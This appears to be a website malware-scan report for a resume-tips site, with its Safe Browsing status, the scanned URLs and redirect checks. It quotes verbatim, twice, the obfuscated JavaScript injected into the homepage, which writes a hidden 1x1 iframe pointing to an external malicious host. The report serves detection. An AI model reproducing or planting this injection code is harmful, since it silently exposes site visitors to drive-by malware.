Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=greatresumetips.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://greatresumetips.com/ | 200 OK Content-Length: 11557 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vPhrNfgC(sbvGaWP){ fff.op.replace("177");window.eval(); }
document['w124r136i166t169150e'.replace(/[0-9]/g,'')]('<div id=JATpdKnic style="visibility:hidden;display:none">%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%27http%3A%2F%2Fvurmo-st3.cn%2Fvr3%2Findex.php%27%3E%3C%2Fiframe%3E</div>');function ZxMwgdXj(wCvv){ window.eval();window.eval();window.eval(); } document['w156r165i158t174173e'.replace(/[0-9]/g,'')](unescape(document.getElementById('JATpdKnic').innerHTML));function sePqQqbzbz(kyHTcxJEJ){ window.eval();var jpaLGOFG = document.getElementById('GGof'); fff=op.split("1035"); } function VZat(hjz){ fff=op.split("985");var YLwaGLRF=new Function("dBOtiU", "return 224668;"); fff.op.replace("1122"); } function fKcMCrEQwC(NEbQqFgO){ var qqUzJAVSn = document.getElementById('QJYpObFPuc'); fff=op.split("954"); fff.op.replace("567");window.eval(); } Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://greatresumetips.com/index.html | 200 OK Content-Length: 11557 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vPhrNfgC(sbvGaWP){ fff.op.replace("177");window.eval(); }
document['w124r136i166t169150e'.replace(/[0-9]/g,'')]('<div id=JATpdKnic style="visibility:hidden;display:none">%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%27http%3A%2F%2Fvurmo-st3.cn%2Fvr3%2Findex.php%27%3E%3C%2Fiframe%3E</div>');function ZxMwgdXj(wCvv){ window.eval();window.eval();window.eval(); } document['w156r165i158t174173e'.replace(/[0-9]/g,'')](unescape(document.getElementById('JATpdKnic').innerHTML));function sePqQqbzbz(kyHTcxJEJ){ window.eval();var jpaLGOFG = document.getElementById('GGof'); fff=op.split("1035"); } function VZat(hjz){ fff=op.split("985");var YLwaGLRF=new Function("dBOtiU", "return 224668;"); fff.op.replace("1122"); } function fKcMCrEQwC(NEbQqFgO){ var qqUzJAVSn = document.getElementById('QJYpObFPuc'); fff=op.split("954"); fff.op.replace("567");window.eval(); } Antivirus reports:
| ||
http://greatresumetips.com/sample-resume-template.html | 200 OK Content-Length: 6697 Content-Type: text/html | clean |
http://greatresumetips.com/articles_1.html | 200 OK Content-Length: 2492 Content-Type: text/html | clean |
http://greatresumetips.com/professional-resume-services.html | 200 OK Content-Length: 4998 Content-Type: text/html | clean |
http://greatresumetips.com/ResumeEdge | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://greatresumetips.com/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://greatresumetips.com/Resume-Maker.html | 200 OK Content-Length: 6067 Content-Type: text/html | clean |
http://greatresumetips.com/pongo | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://greatresumetips.com/CareerBuilder | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://greatresumetips.com/Resume-Services.html | 200 OK Content-Length: 6736 Content-Type: text/html | clean |
http://greatresumetips.com/Resume-Template.html | 200 OK Content-Length: 5309 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: greatresumetips.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:45:28 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 11557
Content-Type: text/html
Last-Modified: Wed, 14 Oct 2009 10:20:14 GMT
...11557 bytes of data.
GET / HTTP/1.1
Host: greatresumetips.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:45:28 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 11557
Content-Type: text/html
Last-Modified: Wed, 14 Oct 2009 10:20:14 GMT
...11557 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: greatresumetips.com
Referer: http://www.google.com/search?q=greatresumetips.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: greatresumetips.com
Referer: http://www.google.com/search?q=greatresumetips.com
Result:
The result is similar to the first query. There are no suspicious redirects found.